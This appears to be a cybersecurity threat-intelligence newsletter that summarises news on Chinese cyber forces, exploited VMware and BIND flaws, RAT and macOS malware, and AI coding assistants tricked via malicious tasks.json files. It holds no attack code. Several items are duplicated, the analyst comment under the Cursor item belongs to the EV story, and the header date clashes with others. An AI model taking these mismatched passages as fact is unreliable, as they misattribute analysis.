Daily Drop (1234)
01-26-26
Monday, Jan 26, 2025 // (IG): BB // GITHUB // SN R&D
China’s Expanding Cyber Forces Blend Civilian Talent and Military Strategy, Raising Global Security Stakes
Bottom Line Up Front (BLUF): China has built a sophisticated cyberwarfare ecosystem that combines state-employed military hackers with civilian security researchers, enabling both espionage and offensive operations. The newly formed People’s Liberation Army Cyberspace Force (PLA CSF) and agencies like the Ministry of State Security are leveraging a vast pool of domestic vulnerability researchers, strict reporting laws, and private partnerships to assemble a strategic stockpile of zero-days—capabilities that could be used to disrupt foreign military and civilian infrastructure in times of conflict.
Analyst Comments: By requiring domestic researchers to report all vulnerabilities to the state within 48 hours—and banning their participation in foreign exploit contests—China has effectively built a state-owned zero-day arsenal. The creation of competitions like the Tianfu Cup ensures continued development of elite talent within its borders. The article rightly compares China’s potential cyber doctrine to WWII-era strategic bombing: cripple systems, disrupt logistics, sow public distrust, and paralyze defense infrastructure—all without firing a kinetic shot. Publicized incidents like Volt Typhoon’s infiltration of U.S. critical infrastructure are likely just the tip of the iceberg.
READ THE STORY: RealClearDefense
VMware vCenter RCE Flaw Actively Exploited — CISA Demands Immediate Patching Across Federal Networks
Bottom Line Up Front (BLUF): CVE-2024-37079, a critical remote code execution vulnerability (CVSS 9.8) in VMware vCenter Server, is now being actively exploited in the wild, according to confirmations from both Broadcom and CISA. The flaw, caused by a heap-overflow in the DCERPC protocol, was patched in June 2024, but many systems remain vulnerable. As of January 26, the vulnerability has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog under Binding Operational Directive (BOD) 22-01, requiring federal agencies to remediate within 21 days.
Analyst Comments: The bug affects vCenter’s DCERPC implementation, a protocol used for network management tasks—meaning it sits in the exact control layer threat actors want to compromise. Exploitation allows full takeover of vSphere environments, including creating rogue VMs, cloning snapshots, or escalating privileges silently. We’ve already seen attackers exploit VMware vCenter for espionage and ransomware staging. With no details released yet on the current wave of exploitation, assume both criminal and state-linked APT actors are leveraging this in active campaigns.
READ THE STORY: SDxCentral // SecurityWeek
Remcos RAT Delivered via Fake Resume Emails: New Campaign Targets Organizations with Stealthy Payloads
Bottom Line Up Front (BLUF): Researchers have uncovered a phishing campaign using fake resume-themed emails to deliver the Remcos remote access trojan (RAT). Attackers distribute malicious .zip or .img attachments containing executable droppers disguised as job application materials. Once executed, the payload installs Remcos, granting attackers persistent access, keylogging, and system control capabilities. The campaign uses common evasion techniques to bypass basic AV and EDR solutions.
Analyst Comments: Remcos is a known commodity in the RAT ecosystem—cheap, effective, and commonly seen in commodity phishing. The resume lure is nothing new but still effective, especially when HR or hiring inboxes aren't segmented from internal systems. Once again, we’re reminded how little effort is required to compromise a user when email filtering and endpoint controls aren’t dialed in. Defenders should treat this as a reminder to tighten attachment rules and sandbox strange file types like .img or .iso, which still regularly slip through.
READ THE STORY: GBhackers
Researchers Uncover 76 Zero-Days in EVs and Automotive Tech
Bottom Line Up Front (BLUF): At the inaugural Pwn2Own Automotive 2026 event in Tokyo, security researchers disclosed 76 zero-day vulnerabilitiesacross electric vehicles (EVs), charging infrastructure, and related software ecosystems. Major vendors—including Tesla, Toyota, BMW, and several Tier 1 suppliers—were impacted. Vulnerabilities included remote code execution (RCE), privilege escalation, and full system compromise of EV charging stations and telematics units.
Analyst Comments: While the industry races toward electrification and autonomy, security is clearly lagging. The number and severity of vulnerabilities—RCEs on EV chargers, remote access to in-vehicle systems—demonstrate that many of these products shipped with minimal hardening. These aren’t just infotainment bugs; several of the exploited systems had direct or indirect access to vehicle controls or cloud-based fleet management APIs. Expect both attackers and regulators to take note. For defenders, this is a call to push for threat modeling, code review, and embedded system hardening across automotive suppliers—not just the OEMs.
READ THE STORY: The Register
European Commission’s Revised Cybersecurity Act Targets ‘High-Risk’ Tech Vendors with Supply Chain Ban
Bottom Line Up Front (BLUF): The European Commission has adopted a revised Cybersecurity Act that includes provisions to restrict or ban "high-risk" ICT suppliers from European Union critical infrastructure and public sector projects. The move aligns EU policy more closely with national security concerns and aims to secure the technology supply chain amid growing fears of foreign influence—particularly regarding non-EU vendors from authoritarian states.
Analyst Comments: The revised Act empowers EU institutions to exclude vendors from digital infrastructure if they pose a national security threat, even if those vendors meet technical standards. This reflects growing awareness that supply chain security is not vendor-neutral—origin, ownership, and legal obligations matter. Expect this to affect procurement decisions across member states and drive demand for EU-based or EU-aligned alternatives in cloud services, 5G, and public sector IT deployments.
READ THE STORY: CyberMag
VMware vCenter RCE Flaw Actively Exploited — CISA Demands Immediate Patching Across Federal Networks
Bottom Line Up Front (BLUF): CVE-2024-37079, a critical remote code execution vulnerability (CVSS 9.8) in VMware vCenter Server, is now being actively exploited in the wild, according to confirmations from both Broadcom and CISA. The flaw, caused by a heap-overflow in the DCERPC protocol, was patched in June 2024, but many systems remain vulnerable. As of January 26, the vulnerability has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog under Binding Operational Directive (BOD) 22-01, requiring federal agencies to remediate within 21 days.
Analyst Comments: The bug affects vCenter’s DCERPC implementation, a protocol used for network management tasks—meaning it sits in the exact control layer threat actors want to compromise. Exploitation allows full takeover of vSphere environments, including creating rogue VMs, cloning snapshots, or escalating privileges silently. We’ve already seen attackers exploit VMware vCenter for espionage and ransomware staging. With no details released yet on the current wave of exploitation, assume both criminal and state-linked APT actors are leveraging this in active campaigns.
READ THE STORY: SDxCentral // SecurityWeek
Remcos RAT Delivered via Fake Resume Emails: New Campaign Targets Organizations with Stealthy Payloads
Bottom Line Up Front (BLUF): Researchers have uncovered a phishing campaign using fake resume-themed emails to deliver the Remcos remote access trojan (RAT). Attackers distribute malicious .zip or .img attachments containing executable droppers disguised as job application materials. Once executed, the payload installs Remcos, granting attackers persistent access, keylogging, and system control capabilities. The campaign uses common evasion techniques to bypass basic AV and EDR solutions.
Analyst Comments: Remcos is a known commodity in the RAT ecosystem—cheap, effective, and commonly seen in commodity phishing. The resume lure is nothing new but still effective, especially when HR or hiring inboxes aren’t segmented from internal systems. Once again, we’re reminded how little effort is required to compromise a user when email filtering and endpoint controls aren’t dialed in. Defenders should treat this as a reminder to tighten attachment rules and sandbox strange file types like .img or .iso, which still regularly slip through.
READ THE STORY: GBhackers
Researchers Uncover 76 Zero-Days in EVs and Automotive Tech
Bottom Line Up Front (BLUF): At the inaugural Pwn2Own Automotive 2026 event in Tokyo, security researchers disclosed 76 zero-day vulnerabilitiesacross electric vehicles (EVs), charging infrastructure, and related software ecosystems. Major vendors—including Tesla, Toyota, BMW, and several Tier 1 suppliers—were impacted. Vulnerabilities included remote code execution (RCE), privilege escalation, and full system compromise of EV charging stations and telematics units.
Analyst Comments: While the industry races toward electrification and autonomy, security is clearly lagging. The number and severity of vulnerabilities—RCEs on EV chargers, remote access to in-vehicle systems—demonstrate that many of these products shipped with minimal hardening. These aren’t just infotainment bugs; several of the exploited systems had direct or indirect access to vehicle controls or cloud-based fleet management APIs. Expect both attackers and regulators to take note. For defenders, this is a call to push for threat modeling, code review, and embedded system hardening across automotive suppliers—not just the OEMs.
READ THE STORY: The Register
Ransomware Surge: 74% of Global Orgs Hit in 2023, with Education, IT, and Healthcare Leading Victim List
Bottom Line Up Front (BLUF): The most affected sectors include education (79%), IT/technology (77%), and healthcare (74%). Attackers continue to leverage vulnerable internet-facing systems and stolen credentials, with remote desktop exploitation remaining a top entry vector.
Analyst Comments: The numbers confirm what frontline defenders already feel: ransomware isn’t just persistent—it’s systemic. The fact that nearly 3 out of 4 organizations faced attacks in a single year underscores that prevention isn’t scaling fast enough, and reactive containment still dominates. Education and healthcare remain soft targets due to outdated infrastructure and resource constraints, while IT firms are increasingly hit for supply chain leverage. Initial access techniques haven’t changed much—just scaled in automation and scope. Credential theft, RDP abuse, and software vulnerabilities are still doing the heavy lifting.
READ THE STORY: GBhackers
CISA Adds Versa, Zimbra, Vite, and Prettier to KEV: Active Exploits Confirmed
Bottom Line Up Front (BLUF): CISA has updated its Known Exploited Vulnerabilities (KEV) catalog with four actively exploited CVEs affecting Versa Networks OS, Zimbra Collaboration Suite, Vite (a JavaScript build tool), and the Prettier code formatter. Federal agencies must patch by deadlines ranging from February 12–14, 2026. The inclusion confirms exploitation in the wild, likely tied to opportunistic or targeted attacks against internet-facing systems and CI/CD environments.
Analyst Comments: This KEV update covers a wide range of enterprise attack surfaces—from network edge devices (Versa) to mail servers (Zimbra) to developer tooling (Vite, Prettier). That’s a full stack of trouble. The exploitation of open-source developer tools like Vite and Prettier is particularly concerning—it suggests threat actors are moving upstream in the supply chain, targeting build environments and CI pipelines. If you’re running any of these tools in production or dev environments, treat this as high priority. For defenders, the KEV list isn’t just a compliance checklist—it’s a threat radar.
READ THE STORY: WPN
Microsoft Teams to Share Employee Location: New Feature Raises Security and Privacy Flags
Bottom Line Up Front (BLUF): Microsoft Teams will soon allow organizations to track and share employee location data through a new "Location API." Intended for industries with mobile or field-based workforces, the feature integrates with frontline apps and enables real-time location sharing—potentially down to GPS precision. While Microsoft pitches it as an efficiency tool, the shift raises privacy and security concerns around data exposure, abuse, and compliance risks.
Analyst Comments: Location tracking in enterprise collaboration tools is a double-edged sword. Yes, it can streamline field operations and support dispatch use cases—but it also creates a juicy new data source that, if misconfigured or breached, could expose sensitive employee movements. For organizations already struggling with M365 security hygiene, adding location data into the mix raises the stakes. Expect this to be closely watched by privacy teams, insider threat programs, and regulators—especially in tightly controlled industries or regions with strong worker data protections (e.g., GDPR, HIPAA). Security teams should prepare to audit API usage and access controls before enabling.
READ THE STORY: GBhackers
Rustdoor Malware Masquerades as Apple Installer: New Variant Targets macOS with Backdoor Capabilities
Bottom Line Up Front (BLUF): A newly discovered macOS malware dubbed Rustdoor is disguising itself as a legitimate Apple installer package to deploy a stealthy backdoor. Written in Rust and signed with an Apple Developer ID, the malware evades Gatekeeper and runs on Apple Silicon. Once executed, it establishes persistent access, harvests system info, and awaits commands from its C2 server. Researchers say it's actively being updated and shows signs of targeted delivery.
Analyst Comments: MacOS isn’t immune—attackers are just more selective. Rustdoor is a solid reminder that Apple platforms, especially in developer-heavy environments, are viable targets for stealthy backdoors. The use of Rust offers cross-platform flexibility and complicates static analysis. Combine that with a valid Apple signature and this thing slides right past casual defenses. The malware appears designed for reconnaissance and long-term access, not smash-and-grab theft. That smells like espionage or at least well-resourced criminal activity. orgs relying on Macs should revisit their assumptions around threat models and ensure telemetry on install packages, persistence mechanisms (LaunchAgents, LaunchDaemons), and signed binaries.
READ THE STORY: Freebuf
Cursor's Hidden Trap: Malicious tasks.json Files Turn AI Coding Assistants into Stealthy Backdoors
Bottom Line Up Front (BLUF): When an AI tool auto-generates or accepts malicious project files, it may unknowingly execute hidden payloads during task runs—giving attackers a stealthy, code-signed path to system compromise. This novel technique highlights how AI coding copilots can be manipulated into delivering malware under the guise of trusted automation.
Analyst Comments: While the industry races toward electrification and autonomy, security is clearly lagging. The number and severity of vulnerabilities—RCEs on EV chargers, remote access to in-vehicle systems—demonstrate that many of these products shipped with minimal hardening. These aren't just infotainment bugs; several of the exploited systems had direct or indirect access to vehicle controls or cloud-based fleet management APIs. Expect both attackers and regulators to take note. For defenders, this is a call to push for threat modeling, code review, and embedded system hardening across automotive suppliers—not just the OEMs.
READ THE STORY: WPN
New Android Malware “Wpeeper” Uses P2P Communication to Evade Takedown and Control Infected Devices
Bottom Line Up Front (BLUF): Wpeeper shows a growing trend of mobile malware adopting decentralized C2 models to resist takedown. By using libp2p, attackers eliminate the single point of failure that traditional infrastructure-based malware depends on. That means sinkholing or blocking a few IPs won’t stop this. The malware’s modular functionality—command execution, file access, app control—makes it dangerous in both personal and BYOD enterprise contexts. What’s most concerning is its use of repackaged legitimate apps as delivery vectors, which continues to be a soft spot in Android’s supply chain. Mobile EDRs should start treating P2P traffic as a red flag.
Analyst Comments: Hidden inside repackaged apps—some masquerading as popular tools—the malware avoids centralized command-and-control infrastructure by leveraging the libp2p protocol, typically used in decentralized networks. The campaign appears targeted, and the malware is capable of data exfiltration, remote command execution, and app management.
READ THE STORY: Freebuf
Data Breaches Fuel Crypto Laundering: How Cybercrime Markets Turn Stolen Credentials into Stablecoin Profits
Bottom Line Up Front (BLUF): This piece sheds light on how cybercriminals convert stolen credentials and PII from data breaches into laundered funds using USD-pegged stablecoins. These laundering paths—ranging from direct extortion to fraud and insider abuse—often go undetected due to a disconnect between cybersecurity teams and compliance units. Analysts warn that stablecoins' liquidity, speed, and uneven global regulation make them increasingly attractive to actors seeking to evade sanctions and obfuscate illicit financial flows.
Analyst Comments: They're bridging compromised databases to stablecoin liquidity in minutes, and the defensive side is struggling to keep up. Stablecoins like USDT and USDC now serve as the de facto exit ramp for cybercrime profits, particularly from ransomware and account takeover campaigns. Unless incident response starts integrating chain intelligence and transaction telemetry, detection gaps will persist.
READ THE STORY: Freebuf
"White-Hat" Bots vs. Hackers: Front-Running Theft on Ethereum, But Not Everyone Gets Their Money Back
Bottom Line Up Front (BLUF): A new exposé from CryptoRank reveals how MEV bots—typically seen as profit-seeking tools—are being used by white-hat actors to front-run active hacks on Ethereum, intercepting stolen funds before attackers can cash out. These bots, however, act unilaterally in deciding who gets reimbursed, raising ethical and operational questions about trustless systems suddenly hinging on human discretion.
Analyst Comments: The bots beat thieves by exploiting the same MEV (Maximal Extractable Value) mechanics hackers use, essentially racing malicious transactions to the finish line. But here’s the kicker: the white-hats holding these recovered funds decide who, if anyone, gets refunded, often favoring large protocols or users with connections, while smaller victims go unnoticed.
READ THE STORY: Cryptorank
BIND 9 Flaw Triggers Server Crashes: Critical DoS Bug Impacts DNS Infrastructure
Bottom Line Up Front (BLUF): A newly disclosed vulnerability in BIND 9, the widely used DNS server software, allows remote attackers to crash affected servers by sending specially crafted queries. The flaw, tracked as CVE-2023-50387, affects multiple versions and has been actively crashing DNS servers in the wild. ISC (Internet Systems Consortium) has issued patches, and admins are urged to update immediately to prevent service outages.
Analyst Comments: A remotely triggerable DoS like this doesn’t need to be sexy to be dangerous. Attackers don’t need RCE to cause real damage when they can repeatedly knock out name resolution. While no data theft or takeover is involved, this could be weaponized for disruption, DDoS amplification, or masking other attacks during outages. If you’re running BIND—especially on externally accessible resolvers—patch now, and monitor for query-based anomalies.
READ THE STORY: GBhackers
Items of interest
Multi-Stage Phishing Campaign Hits Russian Targets via Microsoft Windows Exploits
Bottom Line Up Front (BLUF): Rescana researchers have identified a targeted phishing campaign exploiting Microsoft Windows systems in Russian organizations. The attack uses a multi-stage infection chain, beginning with phishing emails that deliver archives containing a deceptive shortcut (.lnk) file. This triggers a PowerShell-based payload used to stage additional malware. The attackers abuse native Windows components like mshta.exe and evade detection by hosting payloads on compromised Russian infrastructure. Attribution is still unclear.
Analyst Comments: Using .lnk files and Windows-native binaries like mshta.exe lets the malware blend in with legitimate activity—harder to detect, especially in environments without PowerShell logging or command-line auditing. The choice to host payloads on Russian servers likely reflects an attempt to reduce suspicion in-country. While attribution isn’t definitive, the campaign’s focus on Russian government and tech targets suggests either espionage or false flag by a nation-state actor. The sophistication points beyond criminal crews.
READ THE STORY: Rescana
Understanding MSHTA: A Classic Windows Attack Still Used Today (Video)
FROM THE MEDIA: Principal Threat Researcher Matt Graeber from Red Canary discusses the continued relevance of the MSHTA attack technique highlighted in their latest threat detection report. This video covers how attackers leverage mshta.exe and mshtml.dll to execute malicious code, common tactics like embedding HTA in legitimate files (even signed ones!), and the shift towards delivering infostealers.
Malware of the Future: What an infected system looks like in 2025 (Video)
FROM THE MEDIA: Malware of the future: What does an infected system look like in 2025, hard to tell. In this video we have a system infected with plenty of trojans.
The selected stories cover a broad range of cyber threats and are intended to help readers frame key publicly discussed threats and improve overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, don't hesitate to get in touch with InfoDom Securities at dominanceinformation@gmail.com.